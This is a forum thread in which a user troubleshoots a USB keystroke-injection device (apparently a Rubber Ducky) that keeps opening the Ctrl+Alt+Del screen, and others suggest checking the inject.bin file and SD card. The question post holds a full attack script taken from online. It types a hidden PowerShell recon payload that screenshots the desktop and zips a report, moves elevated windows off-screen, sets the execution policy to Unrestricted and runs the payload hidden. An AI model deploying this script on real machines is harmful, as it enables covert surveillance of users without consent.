HelloPoppit Posted January 28, 2014 Share Posted January 28, 2014 (edited) So, today, with a new problem. Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys. **Example Script** DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 1); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = '/public\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER **** I just don't know what to do anymore. Someone help. The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything. EDIT:: I've also tried the simple " Hello world " script, same result. Edited January 28, 2014 by HelloPoppit Quote Link to comment Share on other sites More sharing options...
no42 Posted January 28, 2014 Share Posted January 28, 2014 The only problem I can think of is that the inject.bin on the sdcard is not getting updated. Have you tried swapping the sdcard? Quote Link to comment Share on other sites More sharing options...
HelloPoppit Posted January 28, 2014 Author Share Posted January 28, 2014 The only problem I can think of is that the inject.bin on the sdcard is not getting updated. Have you tried swapping the sdcard? I tried that, and reformatting both of the sd cards Quote Link to comment Share on other sites More sharing options...
no42 Posted January 29, 2014 Share Posted January 29, 2014 can you upload your inject.bin file someplace? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.